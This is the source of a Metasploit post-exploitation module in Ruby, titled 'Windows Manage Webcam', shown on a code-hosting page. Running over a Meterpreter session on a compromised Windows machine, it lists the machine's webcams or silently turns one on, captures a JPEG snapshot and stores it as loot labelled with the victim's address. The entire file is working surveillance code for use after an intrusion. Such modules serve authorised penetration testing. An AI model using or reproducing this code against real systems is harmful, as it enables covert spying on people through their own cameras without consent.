Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Auxiliary::Report
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Windows Manage Webcam',
14
        'Description' => %q{
15
          This module will allow the user to detect installed webcams (with
16
          the LIST action) or take a snapshot (with the SNAPSHOT) action.
17
        },
18
        'License' => MSF_LICENSE,
19
        'Author' => [ 'sinn3r'],
20
        'Platform' => [ 'win'],
21
        'SessionTypes' => [ 'meterpreter' ],
22
        'Actions' => [
23
          [ 'LIST', { 'Description' => 'Show a list of webcams' } ],
24
          [ 'SNAPSHOT', { 'Description' => 'Take a snapshot with the webcam' } ]
25
        ],
26
        'DefaultAction' => 'LIST',
27
        'Compat' => {
28
          'Meterpreter' => {
29
            'Commands' => %w[
30
              stdapi_webcam_*
31
            ]
32
          }
33
        }
34
      )
35
    )
36

37
    register_options(
38
      [
39
        OptInt.new('INDEX', [false, 'The index of the webcam to use', 1]),
40
        OptInt.new('QUALITY', [false, 'The JPEG image quality', 50])
41
      ]
42
    )
43
  end
44

45
  def run
46
    if client.nil?
47
      print_error("Invalid session ID selected. Make sure the host isn't dead.")
48
      return
49
    end
50

51
    if !action
52
      print_error('Invalid action')
53
      return
54
    end
55

56
    case action.name
57
    when /^list$/i
58
      list_webcams(true)
59
    when /^snapshot$/i
60
      snapshot
61
    end
62
  end
63

64
  def rhost
65
    client.sock.peerhost
66
  end
67

68
  def snapshot
69
    webcams = list_webcams
70

71
    if webcams.empty?
72
      print_error("#{rhost} - No webcams found")
73
      return
74
    end
75

76
    if !(webcams[datastore['INDEX'] - 1])
77
      print_error("#{rhost} - No such index: #{datastore['INDEX']}")
78
      return
79
    end
80

81
    buf = nil
82

83
    begin
84
      print_status("#{rhost} - Starting...")
85
      client.webcam.webcam_start(datastore['INDEX'])
86

87
      buf = client.webcam.webcam_get_frame(datastore['QUALITY'])
88
      if buf
89
        print_status("#{rhost} - Got frame")
90

91
        p = store_loot(
92
          "#{rhost}.webcam.snapshot",
93
          'application/octet-stream',
94
          rhost,
95
          buf,
96
          "#{rhost}_snapshot.jpg",
97
          "#{rhost} Webcam Snapshot"
98
        )
99

100
        print_good("#{rhost} - Snapshot saved: #{p}")
101
      end
102

103
      client.webcam.webcam_stop
104
      print_status("#{rhost} - Stopped")
105
    rescue Rex::Post::Meterpreter::RequestError => e
106
      print_error(e.message)
107
      return
108
    end
109
  end
110

111
  def list_webcams(show = false)
112
    begin
113
      webcams = client.webcam.webcam_list
114
    rescue Rex::Post::Meterpreter::RequestError
115
      webcams = []
116
    end
117

118
    if show
119
      tbl = Rex::Text::Table.new(
120
        'Header' => 'Webcam List',
121
        'Indent' => 1,
122
        'Columns' => ['Index', 'Name']
123
      )
124

125
      webcams.each_with_index do |name, indx|
126
        tbl << [(indx + 1).to_s, name]
127
      end
128

129
      print_line(tbl.to_s)
130
    end
131

132
    return webcams
133
  end
134
end
135

136